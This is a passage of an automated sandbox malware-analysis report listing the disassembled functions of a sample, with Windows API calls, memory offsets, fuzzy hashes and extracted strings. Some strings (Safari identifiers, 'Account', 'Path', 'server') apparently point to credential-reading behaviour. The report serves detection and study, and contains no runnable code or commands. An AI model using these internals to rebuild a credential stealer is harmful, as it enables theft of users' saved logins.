                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                                • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                                • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                                Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                                                                                                                • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                                                                                                                • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                                                                                                                Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                                • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                                • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                                Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                                • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                                • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                                Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                                • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                                • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                                Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                                • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                                • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                                Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                                • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                                                                                • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                                Function 0040B633 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                Function 0040AA04 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                                • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                                                                • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                                Function 00415304 Relevance: 1.3, APIs: 1, Instructions: 6COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                                                • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                                                                                • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                • free.MSVCRT ref: 00418370
                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                • API String ID: 2360000266-2664311388
                                                                                                                                                • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                                                                                • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Version
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1889659487-0
                                                                                                                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                • memset.MSVCRT ref: 0040265F
                                                                                                                                                • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                • API String ID: 577499730-1134094380
                                                                                                                                                • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                • GetDC.USER32 ref: 004140E3
                                                                                                                                                • wcslen.MSVCRT ref: 00414123
                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                • API String ID: 2080319088-3046471546
                                                                                                                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                • memset.MSVCRT ref: 00413292
                                                                                                                                                • memset.MSVCRT ref: 004132B4
                                                                                                                                                • memset.MSVCRT ref: 004132CD
                                                                                                                                                • memset.MSVCRT ref: 004132E1
                                                                                                                                                • memset.MSVCRT ref: 004132FB
                                                                                                                                                • memset.MSVCRT ref: 00413310
                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                • memset.MSVCRT ref: 004133C0
                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                Strings
                                                                                                                                                • {Unknown}, xrefs: 004132A6
                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 829165378-0
                                                                                                                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
